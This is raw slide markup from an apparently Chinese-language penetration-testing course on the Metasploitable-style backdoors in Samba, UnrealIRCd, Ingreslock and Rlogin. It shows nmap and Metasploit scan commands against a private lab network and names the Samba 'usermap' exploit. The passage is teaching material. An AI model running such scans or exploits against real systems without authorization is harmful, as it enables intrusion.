                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>12、Druby远程代码执行漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>13、Ingreslock 后门漏洞</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>14、Rlogin 后门漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33114079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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{403B9A06-1BA8-1C28-05B4-7549F39B8930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9520" y="981556"/>
            <a:ext cx="12196761" cy="46014"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21B6BB"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{91240B29-F687-4F45-9708-019B960494DF}">
              <a14:hiddenLine xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" w="25400" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="BA0000"/>
                </a:solidFill>
                <a:bevel/>
                <a:headEnd/>
                <a:tailEnd/>
              </a14:hiddenLine>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="121900" tIns="60949" rIns="121900" bIns="60949" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1218590" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2399">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAF7D158-FA15-49AD-EC5B-52155B40A7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1329760"/>
            <a:ext cx="10193338" cy="717550"/>
          </a:xfrm>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>渗透攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606962" y="2043903"/>
            <a:ext cx="10937338" cy="2242858"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UNIX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统上实现，由服务器及客户端程序构成。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Server Messages Block</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，信息服务块）是一种在局域网上共享文件和打印机的一种通信协议，它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务对应端口有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>139</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>445</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7257656" y="3543081"/>
            <a:ext cx="5043368" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>先扫描服务版本：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>use auxiliary/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>smb_version</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>rhosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 192.168.77.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>set threads 10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50277F3B-4523-6804-DCB8-7105E6B5CCFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606962" y="4552779"/>
            <a:ext cx="7874000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>先看端口是否开放：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 192.168.77.133 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1377CB63-17A5-86B7-C469-CE03EA83FACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9520" y="5457582"/>
            <a:ext cx="7248136" cy="879718"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4039948063"/>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82344A2D-47E0-0155-C33E-2ACE97514D72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="88578" y="2501858"/>
            <a:ext cx="3195521" cy="7175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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>渗透攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>usermap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的脚本进行攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1C751C5-6F02-FAD0-6D6D-1106DAA45D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4099" y="704854"/>
            <a:ext cx="8907901" cy="6153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63772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03883" y="1322998"/>
            <a:ext cx="10515600" cy="819306"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnreallRCd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="华文新楷"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>后门漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="华文新楷"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571507" y="2142304"/>
            <a:ext cx="10730744" cy="3816429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码，远程攻击者就能够执行任意代码。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnrealIRCd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是一个开源的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IRC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务器，利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>UnrealIRCd</a:t>
            </a:r>
            <a:r>
